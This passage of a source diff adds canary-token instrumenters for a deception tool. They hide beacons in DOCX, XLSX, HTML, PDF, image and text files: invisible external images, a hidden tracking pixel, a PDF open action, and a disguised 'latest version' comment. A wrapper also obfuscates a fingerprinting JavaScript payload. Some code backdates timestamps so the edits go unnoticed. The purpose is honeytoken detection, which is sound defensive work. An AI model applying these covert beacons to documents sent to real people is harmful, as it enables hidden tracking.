 _BODY_END = re.compile(rb"</w:body\s*>", re.IGNORECASE)
 def _next_rid(rels_xml: bytes) -> str:
    """Return an rId not already taken in the relationships file.
    Word's loader tolerates non-sequential ids, so we just pick one
    well above the typical range to avoid collisions.
    """
    used = set(m.group(1).decode() for m in re.finditer(rb'Id="(rId\d+)"', rels_xml))
    for n in range(900, 9999):
        rid = f"rId{n}"
        if rid not in used:
            return rid
    raise InstrumenterRejectedError("DOCX has too many relationships to allocate a new rId")
 def _inject_relationship(rels_xml: bytes, rid: str, url: str) -> bytes:
    """Insert an external image relationship before ``</Relationships>``.
    The new ``<Relationship>`` has ``Id=rid``, the OOXML image
    relationship type, ``Target=url`` and ``TargetMode="External"``.
    ``url`` is XML-escaped before it is placed in the attribute, so a
    callback base containing ``&``, ``<``, ``>`` or ``"`` cannot
    produce a malformed rels part.  URLs without those characters are
    emitted unchanged.
    Raises :class:`InstrumenterRejectedError` when ``rels_xml`` has no
    closing ``</Relationships>`` tag.
    """
    from xml.sax.saxutils import escape
    safe_url = escape(url, {'"': "&quot;"})
    rel = (
        f'<Relationship Id="{rid}" '
        f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{safe_url}" TargetMode="External"/>'
    ).encode()
    match = _RELS_END.search(rels_xml)
    if not match:
        raise InstrumenterRejectedError(
            "DOCX rels file has no </Relationships>; refusing to mutate"
        )
    cut = match.start()
    return rels_xml[:cut] + rel + rels_xml[cut:]
 def _drawing(rid: str) -> bytes:
    # Minimal w:drawing tree referencing the external image at rid.
    # Dimensions are 1 EMU x 1 EMU so the image is invisible; Word
    # still fetches the resource on document load.
    return (
        '<w:p><w:r><w:drawing>'
        '<wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">'
        '<wp:extent cx="1" cy="1"/><wp:docPr id="1" name="canary"/>'
        '<a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">'
        '<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">'
        '<pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">'
        '<pic:nvPicPr><pic:cNvPr id="1" name="canary"/><pic:cNvPicPr/></pic:nvPicPr>'
        '<pic:blipFill>'
        f'<a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:link="{rid}"/>'
        '<a:stretch><a:fillRect/></a:stretch>'
        '</pic:blipFill>'
        '<pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="1" cy="1"/></a:xfrm>'
        '<a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr>'
        '</pic:pic></a:graphicData></a:graphic></wp:inline>'
        '</w:drawing></w:r></w:p>'
    ).encode()
 def _trailing_sectpr_start(body_xml: bytes) -> int:
    """Return the offset of a ``<w:sectPr>`` element that ends ``body_xml``, or -1.
    ``body_xml`` is everything before ``</w:body>``.  Only an element
    followed by nothing but whitespace qualifies; a ``<w:sectPr>``
    nested in a paragraph's properties is followed by closing tags and
    is therefore ignored.  Nested ``<w:sectPr>`` elements (as found
    inside ``<w:sectPrChange>``) are handled by tracking depth so the
    outermost start is returned.
    """
    depth = 0
    opened_at = -1
    last_span = None
    # The lookahead keeps names such as w:sectPrChange from matching.
    for tag in re.finditer(rb"<(/?)w:sectPr(?=[\s/>])[^>]*?(/?)>", body_xml):
        is_close, is_empty = tag.group(1), tag.group(2)
        if is_close:
            if depth > 0:
                depth -= 1
                if depth == 0:
                    last_span = (opened_at, tag.end())
        elif is_empty:
            if depth == 0:
                last_span = (tag.start(), tag.end())
        else:
            if depth == 0:
                opened_at = tag.start()
            depth += 1
    if last_span is not None and not body_xml[last_span[1]:].strip():
        return last_span[0]
    return -1
 def _inject_drawing(document_xml: bytes, rid: str) -> bytes:
    """Insert the canary drawing paragraph at the end of the body content.
    The WordprocessingML schema requires the body-level ``<w:sectPr>``
    to be the last child of ``<w:body>``, so when one is present the
    paragraph goes immediately before it; otherwise it goes immediately
    before ``</w:body>``.
    Raises :class:`InstrumenterRejectedError` when there is no
    ``</w:body>`` tag.
    """
    match = _BODY_END.search(document_xml)
    if not match:
        raise InstrumenterRejectedError("DOCX document.xml has no </w:body>")
    body_end = match.start()
    sect_at = _trailing_sectpr_start(document_xml[:body_end])
    insert_at = sect_at if sect_at != -1 else body_end
    return document_xml[:insert_at] + _drawing(rid) + document_xml[insert_at:]
 def _mutate(blob: bytes, url: str) -> Tuple[bytes, str]:
    """Return ``(new_docx_bytes, rid)`` with the callback image wired in.
    ``word/_rels/document.xml.rels`` gains an external image
    relationship to ``url`` and ``word/document.xml`` gains a drawing
    that references it; every other member is copied through.
    All members, including the two rewritten ones, are written with
    their original :class:`zipfile.ZipInfo`, so timestamps, attributes
    and compression method carry over.  Writing the rewritten members
    by name instead would stamp them with the current time and make
    them stand out from the rest of the archive.
    Raises :class:`InstrumenterRejectedError` when the blob is not a
    zip archive or lacks either expected member.
    """
    rels_name = "word/_rels/document.xml.rels"
    doc_name = "word/document.xml"
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
            try:
                rels = zf.read(rels_name)
                doc = zf.read(doc_name)
            except KeyError as e:
                raise InstrumenterRejectedError(
                    f"DOCX missing expected member: {e.args[0]!r}"
                ) from e
            members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
    except zipfile.BadZipFile as e:
        raise InstrumenterRejectedError("uploaded blob is not a valid DOCX zip") from e
    rid = _next_rid(rels)
    replacements = {
        rels_name: _inject_relationship(rels, rid, url),
        doc_name: _inject_drawing(doc, rid),
    }
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
        for zi, data in members:
            # Passing the ZipInfo (not the filename) keeps the original
            # date_time/attributes; writestr recomputes size and CRC.
            zf_out.writestr(zi, replacements.get(zi.filename, data))
    return out.getvalue(), rid
 class DocxInstrumenter(CanaryInstrumenter):
    """Instrument an uploaded DOCX with an external-image callback."""
    name = "docx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
    )
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` rewritten so it links to ``<http_base>/c/<token>``."""
        base = ctx.http_base.rstrip("/")
        callback = f"{base}/c/{ctx.callback_token}"
        new_blob, rel_id = _mutate(blob, callback)
        note = f"injected external-image relationship {rel_id} -> {callback}"
        return CanaryArtifact(
            path=target_path,
            content=new_blob,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[note],
        )
--- a/decnet/canary/instrumenters/html.py
+++ b/decnet/canary/instrumenters/html.py
@@ -0,0 +1,46 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """HTML instrumenter — append a 1×1 tracking pixel.
 Stdlib-only.  We don't parse the HTML; we just inject the ``<img>``
 tag immediately before the closing ``</body>`` (or, failing that, at
 the end of the document).  Most renderers that support remote images
 (email previewers, IDE doc previews, browsers) will fetch it as
 soon as the document is opened.
 """
 from __future__ import annotations
 import re
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 _BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)
 class HtmlInstrumenter(CanaryInstrumenter):
    """Instrument an HTML document with a hidden 1x1 ``<img>`` callback."""
    name = "html"
    mime_prefixes = ("text/html", "application/xhtml+xml")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Insert the pixel before the first ``</body>``, or append it.
        When no closing body tag is found the pixel is appended on its
        own line at the end of the document.
        """
        callback = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        tag = (
            f'<img src="{callback}" width="1" height="1" '
            'alt="" style="display:none">\n'
        ).encode()
        closing = _BODY_CLOSE.search(blob)
        if closing is None:
            padded = blob if blob.endswith(b"\n") else blob + b"\n"
            out = padded + tag
            note = "appended 1x1 pixel (no </body> found)"
        else:
            cut = closing.start()
            out = blob[:cut] + tag + blob[cut:]
            note = "injected 1x1 pixel before </body>"
        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[note, f"pixel src={callback}"],
        )
--- a/decnet/canary/instrumenters/image.py
+++ b/decnet/canary/instrumenters/image.py
@@ -0,0 +1,73 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Image instrumenter — requires :mod:`PIL` (optional dependency).
 For PNG/JPEG/GIF we append a tEXt/EXIF chunk carrying the slug so
 ``exiftool`` / ``identify -verbose`` surface the slug, then route the
 detection via a sibling **plain-text companion file**.  The image
 itself can't really embed an HTTP fetcher — image decoders don't
 run network requests on decode — so the realistic detection surface
 is "attacker exfils the image, runs metadata tools on it, hits our
 URL when curious about the embedded marker."
 When Pillow isn't installed we reject and direct the operator to
 ``passthrough`` (which preserves the bytes; the slug then lives in
 the filename only).
 """
 from __future__ import annotations
 import io
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 class ImageInstrumenter(CanaryInstrumenter):
    """Re-encode an uploaded image with the callback URL in its metadata."""
    name = "image"
    mime_prefixes = ("image/png", "image/jpeg", "image/gif")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` re-saved with the callback URL embedded.
        PNG gets two text chunks (``Comment`` and ``X-Canary``); JPEG
        and GIF get a comment segment carrying the URL.  GIFs are saved
        with ``save_all=True`` so an animated upload keeps its frames.
        Any other format Pillow recognises is re-encoded without
        metadata, and the artifact note says so instead of claiming an
        embed that did not happen.
        Raises :class:`InstrumenterRejectedError` when Pillow is not
        installed or when opening/saving the image fails.
        """
        try:
            from PIL import Image, PngImagePlugin
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
                "install Pillow`) or re-upload the artifact with "
                "kind=passthrough so it ships unmodified."
            ) from e
        slug_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        note = f"image metadata carries {slug_url} (slug={ctx.callback_token})"
        try:
            buf_in = io.BytesIO(blob)
            img = Image.open(buf_in)
            fmt = (img.format or "").upper()
            buf_out = io.BytesIO()
            if fmt == "PNG":
                meta = PngImagePlugin.PngInfo()
                meta.add_text("Comment", f"reference: {slug_url}")
                meta.add_text("X-Canary", ctx.callback_token)
                img.save(buf_out, format="PNG", pnginfo=meta)
            elif fmt in ("JPEG", "JPG"):
                # Pillow encodes JPEG comments via the ``comment`` kwarg.
                img.save(buf_out, format="JPEG", comment=slug_url.encode())
            elif fmt == "GIF":
                # save_all keeps every frame of an animated GIF; without
                # it only the first frame would survive the re-encode.
                img.save(
                    buf_out, format="GIF", save_all=True,
                    comment=slug_url.encode(),
                )
            else:
                # Some other format Pillow happened to recognise: no
                # uniform comment support, so re-encode without an embed
                # and report that honestly.
                out_fmt = fmt or "PNG"
                img.save(buf_out, format=out_fmt)
                note = (
                    f"re-encoded as {out_fmt} without metadata embed "
                    f"(slug={ctx.callback_token} is not in the image bytes)"
                )
            mutated = buf_out.getvalue()
        except Exception as e:
            raise InstrumenterRejectedError(f"failed to instrument image: {e!s}") from e
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 30,
            instrumenter=self.name,
            notes=[note],
        )
--- a/decnet/canary/instrumenters/passthrough.py
+++ b/decnet/canary/instrumenters/passthrough.py
@@ -0,0 +1,38 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Passthrough instrumenter — bytes go to disk unchanged.
 Used as the dispatch fallback for content types we can't safely
 mutate (random binary blobs, container images, archives we don't
 recognise).  In passthrough mode the only callback surface is the
 :attr:`CanaryToken.placement_path` itself: the operator must use a
 DNS-callback token whose slug appears in the filename, so a
 listing/access at the OS level resolves the slug as part of the
 path (e.g. ``/etc/<slug>.canary.example.test/secrets.bin``) when
 the attacker greps for hostnames in their loot.
 The instrumenter does not enforce that — the API does, when it sees
 ``instrumenter=passthrough`` with ``kind=http`` it returns 400.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 class PassthroughInstrumenter(CanaryInstrumenter):
    """Instrumenter that returns the uploaded bytes untouched."""
    name = "passthrough"
    # Empty on purpose: this instrumenter is never matched by MIME
    # prefix, only chosen as the fallback by pick_instrumenter_for_mime.
    mime_prefixes = ()
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Wrap ``blob`` in an artifact without modifying it; ``ctx`` is unused."""
        explanation = (
            "passthrough: bytes unchanged — only DNS-callback tokens "
            "trip detection (slug must live in the placement path)"
        )
        return CanaryArtifact(
            path=target_path,
            content=blob,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[explanation],
        )
--- a/decnet/canary/instrumenters/pdf.py
+++ b/decnet/canary/instrumenters/pdf.py
@@ -0,0 +1,77 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """PDF instrumenter — requires :mod:`pikepdf` (optional dependency).
 PDF embedding is non-trivial: the cleanest place to put a callback
 is an ``/AA`` (additional actions) ``/O`` (open) entry on the
 catalog or a ``/URI`` action on a link annotation.  Either path
 needs proper xref-table updates — pikepdf handles that for us.
 If pikepdf isn't available in the environment the instrumenter
 raises :class:`InstrumenterRejectedError` so the API can return a
 clear 400 directing the operator to either install pikepdf or
 re-upload as ``passthrough``.
 We don't ship a stdlib fallback because every "naive" PDF mutation
 I'm aware of (appending raw bytes, splicing into the trailer, etc.)
 breaks the document's xref table and trips a "file is corrupt"
 warning in modern viewers — which the attacker will absolutely
 notice.
 """
 from __future__ import annotations
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 class PdfInstrumenter(CanaryInstrumenter):
    """Instrument a PDF by setting a ``/URI`` action as its ``/OpenAction``."""
    name = "pdf"
    mime_prefixes = ("application/pdf",)
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` re-saved with ``/OpenAction`` pointing at the callback.
        Raises :class:`InstrumenterRejectedError` when pikepdf cannot be
        imported or when opening, editing or saving the document fails.
        """
        try:
            import pikepdf
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it "
                "(`pip install pikepdf`) or re-upload the artifact "
                "with kind=passthrough so it ships unmodified."
            ) from e
        import io
        callback = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        try:
            sink = io.BytesIO()
            with pikepdf.open(io.BytesIO(blob)) as document:
                # The catalog-level /OpenAction is what a viewer runs
                # when the file is opened; here it is a URI action that
                # targets the callback URL.
                document.Root[pikepdf.Name("/OpenAction")] = pikepdf.Dictionary(
                    Type=pikepdf.Name("/Action"),
                    S=pikepdf.Name("/URI"),
                    URI=pikepdf.String(callback),
                )
                document.save(sink)
                mutated = sink.getvalue()
        except Exception as e:
            raise InstrumenterRejectedError(
                f"failed to instrument PDF: {e!s}"
            ) from e
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[f"installed /OpenAction /URI -> {callback}"],
        )
--- a/decnet/canary/instrumenters/plain.py
+++ b/decnet/canary/instrumenters/plain.py
@@ -0,0 +1,80 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Plain-text / config-file instrumenter.
 Two embedding strategies, picked in order:
 1. **Token substitution.**  If the blob contains the literal
   placeholder ``{{CANARY_URL}}`` or ``{{CANARY_HOST}}``, replace it.
   This gives operators full control over where the slug lands —
   they can pre-edit the file with placeholders before uploading.
 2. **Append.**  Otherwise, append a comment line that mentions the
   callback URL.  The comment style adapts to the file's apparent
   syntax (``#`` for shell/yaml/python/dockerfile, ``//`` for json5/
   javascript-ish, ``;`` for ini).
 Operators who want neither behavior should upload the file as
 ``passthrough``.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 _SLASH_HINTS = (b"//", b"function ", b"const ", b"let ", b"var ")
 _SEMI_HINTS = (b"[default]", b"[section]", b"\n[")
 def _comment_prefix(blob: bytes) -> bytes:
    """Guess a line-comment prefix from the first 512 bytes of ``blob``.
    Returns ``b"; "`` when any ``_SEMI_HINTS`` marker is present,
    otherwise ``b"// "`` when any ``_SLASH_HINTS`` marker is present,
    otherwise ``b"# "``.
    """
    sample = blob[:512]
    # Order matters: the semicolon hints are consulted before the
    # slash hints, and the first family with a hit decides.
    for hints, glyph in ((_SEMI_HINTS, b"; "), (_SLASH_HINTS, b"// ")):
        for hint in hints:
            if hint in sample:
                return glyph
    return b"# "
 class PlainInstrumenter(CanaryInstrumenter):
    """Instrument text/config files by placeholder substitution or an appended comment."""
    name = "plain"
    mime_prefixes = ("text/", "application/json", "application/yaml", "application/toml")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` with the callback embedded.
        ``{{CANARY_URL}}`` is replaced by ``<http_base>/c/<token>`` and
        ``{{CANARY_HOST}}`` by ``<token>.<dns_zone>``.  When no DNS zone
        is configured, ``{{CANARY_HOST}}`` falls back to the hostname
        parsed from ``http_base`` so the literal placeholder is not
        left in the planted file; the note records the fallback because
        that hostname does not carry the token.  If no placeholder was
        substituted, a comment line mentioning the callback URL is
        appended instead.
        """
        base = ctx.http_base.rstrip("/")
        callback_url = f"{base}/c/{ctx.callback_token}".encode()
        host_fell_back = False
        if ctx.dns_zone:
            callback_host = f"{ctx.callback_token}.{ctx.dns_zone}".encode()
        else:
            from urllib.parse import urlparse
            callback_host = (urlparse(ctx.http_base).hostname or "").encode()
            host_fell_back = bool(callback_host)
        notes: list[str] = []
        out = blob
        if b"{{CANARY_URL}}" in blob:
            out = out.replace(b"{{CANARY_URL}}", callback_url)
            notes.append(f"substituted {{{{CANARY_URL}}}} -> {callback_url.decode()}")
        if b"{{CANARY_HOST}}" in blob and callback_host:
            out = out.replace(b"{{CANARY_HOST}}", callback_host)
            host_note = f"substituted {{{{CANARY_HOST}}}} -> {callback_host.decode()}"
            if host_fell_back:
                host_note += " (no dns_zone; used http_base host, not slug-bearing)"
            notes.append(host_note)
        if not notes:
            # No placeholders — append a comment line at the end.
            prefix = _comment_prefix(blob)
            tail = (
                b"\n" + prefix + b"see " + callback_url
                + b" for the latest version\n"
            )
            out = (out if out.endswith(b"\n") else out + b"\n") + tail
            notes.append(
                f"appended comment line carrying {callback_url.decode()}"
            )
        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=notes,
        )
--- a/decnet/canary/instrumenters/xlsx.py
+++ b/decnet/canary/instrumenters/xlsx.py
@@ -0,0 +1,96 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """XLSX instrumenter — embed an external-image link.
 XLSX is structurally identical to DOCX (Office Open XML zip).  The
 injection target is the workbook's relationships file
 (``xl/_rels/workbook.xml.rels``).  We add an external image
 relationship there; Excel/LibreOffice fetch external images on
 workbook open in the same way Word does.
 We don't inject a ``<drawing>`` element into a sheet because that
 requires touching ``xl/worksheets/sheetN.xml`` *and* allocating a new
 ``xl/drawings/drawingN.xml`` part — much higher chance of mangling
 the file.  An orphan external image relationship is enough: many
 Office viewers fetch all relationships at open time regardless of
 whether they're referenced from a sheet.
 If the operator wants a stronger trigger (image visible in the
 sheet, fetched even by viewers that lazy-load external resources)
 they should embed the slug as a hyperlink cell content via the
 ``plain``/``passthrough`` instrumenters.
 """
 from __future__ import annotations
 import io
 import zipfile
 from typing import Tuple
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 from decnet.canary.instrumenters.docx import _inject_relationship, _next_rid
 _RELS_PATHS = (
    "xl/_rels/workbook.xml.rels",
    "xl/_rels/sharedStrings.xml.rels",
 )
 def _mutate(blob: bytes, url: str) -> Tuple[bytes, str, str]:
    """Return ``(new_xlsx_bytes, rid, rels_path)`` with the callback wired in.
    The relationships part to edit is chosen in the preference order of
    ``_RELS_PATHS`` rather than by the order in which members happen to
    be stored in the archive.  That part gains an external image
    relationship to ``url``; all other members are copied through with
    their original :class:`zipfile.ZipInfo`.
    Raises :class:`InstrumenterRejectedError` when the blob is not a
    zip archive or contains none of the candidate rels parts.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
            members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
    except zipfile.BadZipFile as e:
        raise InstrumenterRejectedError("uploaded blob is not a valid XLSX zip") from e
    present = {zi.filename for zi, _ in members}
    target_rels = next((p for p in _RELS_PATHS if p in present), None)
    if not target_rels:
        raise InstrumenterRejectedError(
            "XLSX has no workbook relationships file to mutate"
        )
    rid = ""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
        for zi, data in members:
            if zi.filename == target_rels:
                rid = _next_rid(data)
                data = _inject_relationship(data, rid, url)
            zf_out.writestr(zi, data)
    return out.getvalue(), rid, target_rels
 class XlsxInstrumenter(CanaryInstrumenter):
    """Instrument an uploaded XLSX with an external-image relationship."""
    name = "xlsx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    )
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        """Return ``blob`` rewritten so a rels part links to ``<http_base>/c/<token>``."""
        base = ctx.http_base.rstrip("/")
        callback = f"{base}/c/{ctx.callback_token}"
        new_blob, rel_id, rels_path = _mutate(blob, callback)
        note = (
            f"injected external-image relationship {rel_id} into "
            f"{rels_path} -> {callback}"
        )
        return CanaryArtifact(
            path=target_path,
            content=new_blob,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[note],
        )
--- a/decnet/canary/obfuscator.py
+++ b/decnet/canary/obfuscator.py
@@ -0,0 +1,178 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Per-mint JS obfuscator wrapper.
 Thin Python wrapper around the ``javascript-obfuscator`` Node package.
 Used by the fingerprint generators / instrumenters to produce a unique,
 hard-to-statically-analyse JS blob per canary mint.
 Two design choices flow from the canary contract in :mod:`base`:
 * **Determinism.** Generators must return byte-identical artifacts for
  the same ``(callback_token, http_base, dns_zone, persona)``.  We
  derive a numeric seed from the callback token and pass it to the
  obfuscator's own ``seed`` option, and we derive the polymorphic
  config bits from the same hash so a re-mint reproduces exactly.
 * **Per-mint uniqueness.** Two different callback tokens produce
  structurally different output: different identifier names, different
  string-array rotation, optionally different transforms enabled.
 The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
 We pass code+options as JSON on stdin and read the obfuscated result
 from stdout.  Stderr surfaces obfuscator failures.
 """
 from __future__ import annotations
 import hashlib
 import hmac
 import json
 import os
 import subprocess  # nosec B404 — Node helper exec is the whole point
 from pathlib import Path
 from typing import Any
 _HELPER = Path(__file__).parent / "_obfuscate_helper.js"
 _PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
 # Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
 # specific runtime; default to PATH lookup.
 _NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
 # Hard timeout for the obfuscator subprocess. Real runs on the
 # fingerprint payload sit well under 5s on a dev box.
 _TIMEOUT_S = 30
 class ObfuscatorError(RuntimeError):
    """Raised when the Node helper fails or returns empty output.
    :func:`obfuscate` raises this when the ``node`` binary is missing,
    the subprocess times out, the helper exits non-zero, or its stdout
    is empty.
    """
 class FingerprintSecretMissing(RuntimeError):
    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset or empty.
    Raised by :func:`nonce_for`.  Fingerprint canaries embed a per-mint
    nonce derived from this server-side secret; without it the worker
    cannot validate incoming fingerprint beacons, so we fail loud at
    mint time rather than ship a defeatable canary.
    """
 _FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password
 def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Return the per-mint fingerprint nonce as 16 lowercase hex chars.
    The nonce is the first 16 hex characters (64 bits) of an
    HMAC-SHA256 whose key is the value of the environment variable
    named by ``_FINGERPRINT_SECRET_ENV`` and whose message is
    ``callback_token + "|" + mint_uuid`` (both UTF-8 encoded).
    Raises :class:`FingerprintSecretMissing` when the environment
    variable is unset or empty.
    """
    master_secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if not master_secret:
        raise FingerprintSecretMissing(
            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
        )
    key = master_secret.encode("utf-8")
    message = f"{callback_token}|{mint_uuid}".encode("utf-8")
    mac = hmac.new(key, message, hashlib.sha256)
    return mac.hexdigest()[:16]
 def _seed_from_token(callback_token: str) -> int:
    """Derive a 31-bit numeric seed from the callback token.
    ``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
    using a SHA-256-derived prefix gives us a uniform distribution
    across the 31-bit positive range.
    """
    h = hashlib.sha256(callback_token.encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
 def _config_from_seed(seed: int) -> dict[str, Any]:
    """Build a deterministic, per-mint obfuscator config.
    The hash bits drive *which* transforms apply — two mints get
    structurally different outputs, not just different identifier names.
    Defaults stay aggressive enough that reverse engineering is real
    work; we never disable string-array or rename, only vary the dial.
    """
    bits = seed
    encodings = ("base64", "rc4")
    string_array_encoding = [encodings[bits & 1]]
    control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0  # 0.5 .. ~1.0
    dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0  # 0.2 .. ~0.7
    transform_object_keys = bool((bits >> 17) & 1)
    numbers_to_expressions = bool((bits >> 18) & 1)
    simplify = bool((bits >> 19) & 1)
    return {
        "compact": True,
        "seed": seed,
        "controlFlowFlattening": True,
        "controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
        "deadCodeInjection": True,
        "deadCodeInjectionThreshold": round(dead_code_threshold, 3),
        "stringArray": True,
        "stringArrayEncoding": string_array_encoding,
        "stringArrayThreshold": 1,
        "stringArrayRotate": True,
        "stringArrayShuffle": True,
        "splitStrings": True,
        "splitStringsChunkLength": 4 + (bits & 7),
        "transformObjectKeys": transform_object_keys,
        "numbersToExpressions": numbers_to_expressions,
        "simplify": simplify,
        "selfDefending": False,  # breaks SVG embed; not worth the cost
        "renameGlobals": False,
        "identifierNamesGenerator": "mangled-shuffled",
    }
 def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.
    The seed and option set are derived from the token, serialised
    together with *code* as JSON, and piped to the Node helper on
    stdin; the helper's stdout is returned verbatim.
    Both pipes are pinned to UTF-8 so the result does not depend on
    the host locale.
    Raises :class:`ObfuscatorError` if the ``node`` binary is missing
    or cannot be launched, the run exceeds ``_TIMEOUT_S``, the helper
    exits non-zero, or it returns empty output.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            encoding="utf-8",
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    except OSError as e:
        # e.g. PermissionError when DECNET_NODE_BIN points at a
        # non-executable file: keep the documented exception contract.
        raise ObfuscatorError(
            f"could not launch node binary {_NODE_BIN!r}: {e}"
        ) from e
    if proc.returncode != 0:
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
 def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
 ) -> str:
    """Render and obfuscate the fingerprint payload for one mint.
    Reads the template at ``_PAYLOAD``, replaces the placeholders
    ``{{BEACON_URL}}``, ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}`` (in
    that order), and passes the result to :func:`obfuscate` keyed on
    *callback_token*.  The beacon URL is
    ``<http_base>/c/<callback_token>`` with any trailing slash on
    *http_base* removed.  How the script uses the nonce is defined by
    the template, not by this function.
    """
    src = _PAYLOAD.read_text(encoding="utf-8")
    substitutions = (
        ("{{BEACON_URL}}", f"{http_base.rstrip('/')}/c/{callback_token}"),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return obfuscate(src, callback_token=callback_token)
--- a/decnet/canary/package.json
+++ b/decnet/canary/package.json
@@ -0,0 +1,10 @@
 {
  "name": "decnet-canary-obfuscator",
  "version": "0.1.0",
  "private": true,
  "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
  "main": "_obfuscate_helper.js",
  "dependencies": {
    "javascript-obfuscator": "^5.4.2"
  }
 }
--- a/decnet/canary/paths.py
+++ b/decnet/canary/paths.py
@@ -0,0 +1,87 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
